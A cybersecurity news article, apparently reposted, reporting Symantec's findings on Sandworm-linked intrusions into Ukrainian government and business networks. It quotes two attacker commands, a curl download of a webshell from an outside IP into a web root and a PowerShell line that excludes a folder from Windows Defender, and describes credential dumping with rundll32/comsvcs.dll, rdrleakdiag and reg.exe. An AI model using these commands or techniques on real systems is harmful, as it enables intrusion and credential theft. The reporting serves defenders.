Ukrainian Government Entities Under Siege by Cyber Threats
Ukrainian governmental organizations are currently grappling with unrelenting cyber incursions orchestrated by Russian-affiliated threat actors. These adversaries are employing intricate evasion strategies designed to maintain continuous access to sensitive networks.
Recent investigations have unveiled a series of meticulously coordinated campaigns targeting vital infrastructure and government agencies. The attackers are utilizing advanced methodologies that successfully bypass conventional security frameworks.
This surge in cyber operations signifies a notable intensification in targeting strategies, predominantly concentrating on credential harvesting and the extraction of sensitive information, rather than immediate acts of digital sabotage.
The ongoing assaults illustrate a tactical evolution towards prolonged network infiltration, enabling these cyber operatives to conduct thorough reconnaissance while establishing a covert presence over the course of several months.
Symantec analysts have identified two principal intrusion events: one spanning a two-month period against a substantial business services firm and another lasting a week targeting local government infrastructures.
The attackers exhibit remarkable operational security acumen, deliberately minimizing malware usage and relying predominantly on legitimate Windows administration tools in conjunction with dual-use software to elude detection.
Connections to Sandworm and Initial Compromise Details
This campaign is reportedly linked to Sandworm, a unit within the Russian military intelligence (GRU), notorious for its destructive attacks against critical infrastructures such as power grids and satellite communication networks.
The initial breach was facilitated through the deployment of webshells on publicly accessible servers, likely exploiting vulnerabilities that remain unpatched. The threat actors utilized the Localolive webshell, thereby establishing a persistent backdoor for remote command execution.
Living-Off-the-Land Credential Harvesting Mechanisms
The sophisticated evasion tactics deployed by these actors reveal a nuanced understanding of contemporary security measures.
Upon achieving initial access on June 27, 2025, the attackers immediately executed reconnaissance commands using built-in Windows utilities:
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloadsThey intentionally disabled Windows Defender scanning within the Downloads folder, requiring elevated privileges.
Subsequently, the attackers established scheduled tasks that executed every thirty minutes via the legitimate rundll32.exe with comsvcs.dll, enabling memory dumps to extract credentials retained in process memory.
Specifically, they scrutinized KeePass password vault processes through enumeration commands, reflecting a calculated targeting of credential repositories.
Advanced evasion techniques continued with the use of the Windows Resource Leak Diagnostic tool (rdrleakdiag) for conducting memory dumps, a rarely employed method that aids in circumventing security monitoring systems.
Additionally, registry hive exfiltration through native reg.exe commands further facilitated the extraction of crucial credentials and configuration data.
This campaign underscores a prioritization of stealth over speed, with the threat actors adeptly leveraging legitimate administration tools to maintain ambiguity regarding attribution while systematically harvesting sensitive organizational data throughout extended periods of network access.
Source link: Cybersecuritynews.com.
